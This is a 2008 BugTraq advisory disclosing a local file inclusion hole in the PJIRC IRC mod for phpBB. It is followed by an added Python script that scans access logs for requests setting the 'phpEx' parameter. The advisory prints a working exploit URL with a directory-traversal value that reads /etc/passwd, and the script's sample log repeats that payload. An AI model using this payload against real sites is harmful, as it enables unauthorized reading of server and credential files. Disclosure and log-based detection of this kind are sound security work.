BugTraq
phpBB PJIRC mod LFI Mar 25 2008 08:19PM
0in email gmail com
/*

PJIRC mod phpBB Local File Include

Discovered by: 0in from DaRk-CodeRs Programming & Security Group!

Contact: 0in(dot)email[at]gmail(dot)com

Description: This is a simple IRC applet for phpBB.

Download: http://www.hotscripts.pl/produkt-1998.html

HTTP://Dark-Coders.4rh.eu

Greetz to: All DaRk-CodeRs Team Members: die_anglel, m4r1usz, sun8hclf, djlinux, aristo89

*/

$phpEx not defined ;(

Vuln line:

./irc.php:31 include($php_root_path. 'common.' .$phpEx);

Exploit:

http://target.com/[path]/irc.php?phpEx=[LFI]

Ex.

http://target.com/forum/irc/irc.php?phpEx=./../../../../../../etc/passwd

//EoFF
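
Added example (not part of the original advisory and not PJIRC or phpBB code): a log check for requests that set `phpEx`, the variable the flagged include() trusts, from the query string. The log lines are constructed samples in combined log format; the `classify`/`scan` names and the rule that a plain extension is a short alphanumeric token are assumptions of this sketch.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines; not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Mar/2008:20:19:00 +0000] "GET /forum/irc/irc.php HTTP/1.1" 200 5120',
    '192.0.2.11 - - [25/Mar/2008:20:20:00 +0000] '
    '"GET /forum/irc/irc.php?phpEx=./../../../../../../etc/passwd HTTP/1.1" 200 1843',
    '192.0.2.12 - - [25/Mar/2008:20:21:00 +0000] "GET /forum/viewtopic.php?t=5 HTTP/1.1" 200 9000',
    '192.0.2.13 - - [25/Mar/2008:20:22:00 +0000] "GET /forum/irc/irc.php?phpEx=php HTTP/1.1" 200 700',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# phpEx is an internal variable holding a file extension. A request has no
# reason to set it; anything other than a short alphanumeric token is a path.
PLAIN_EXT_RE = re.compile(r'^[A-Za-z0-9]{1,5}$')


def classify(line):
    """Return None, 'phpEx-override' or 'phpEx-path' for one log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    query = urlsplit(m.group(1)).query
    # parse_qs percent-decodes values, so encoded separators are seen decoded.
    values = parse_qs(query, keep_blank_values=True).get('phpEx', [])
    if not values:
        return None
    if any(not PLAIN_EXT_RE.match(v) for v in values):
        return 'phpEx-path'
    return 'phpEx-override'


def scan(lines):
    """Yield (client_ip, verdict, request_target) for every flagged line."""
    for line in lines:
        verdict = classify(line)
        if verdict:
            target = REQUEST_RE.search(line).group(1)
            yield line.split(' ', 1)[0], verdict, target


if __name__ == '__main__':
    for ip, verdict, target in scan(SAMPLE_LOG):
        print(f'{verdict:15} {ip:12} {target}')
```

A `phpEx-override` hit is worth reviewing even when the value looks harmless, since the application never expects that parameter from a client.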
